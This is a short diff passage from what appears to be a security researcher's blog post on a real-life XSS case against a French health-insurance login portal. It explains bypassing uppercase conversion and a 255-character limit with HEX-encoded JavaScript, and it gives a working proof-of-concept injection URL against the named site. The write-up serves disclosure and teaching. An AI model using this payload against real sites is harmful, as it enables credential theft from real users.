phackt/phackt.github.io/_posts/2017-07-25-xss-real-life-case-credentials-stealing.markdown

 ```

 No escaping, no sanitizing or HTML encoding but we will have to deal with UPPERCASE. **HTML is not case sensitive but javascript is**, so we will do some HEX encoding for the javascript part.

 An important thing i forgot to mention is that the payload is **truncated to 255 characters**.

 So this is **how to exploit an XSS when your payload is UPPERCASED (and truncated):**

 **First payload:**
-We can test the XSS thanks to this payload (alert):
+We can test the XSS thanks to this payload (alert - *also notice that we want to preserve the way how the webpage renders*):
 ```
 https://assure.ameli.fr/PortailAS/appmanager/PortailAS/assure?connexioncompte_2numSecuriteSociale=" /><IMG SRC=X ONERROR=&#x61;&#x6C;&#x65;&#x72;&#x74;(&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x64;&#x6F;&#x6D;&#x61;&#x69;&#x6E;) hidden><nimp "&connexioncompte_2codeConfidentiel=&connexioncompte_2actionEvt=connecter
 ```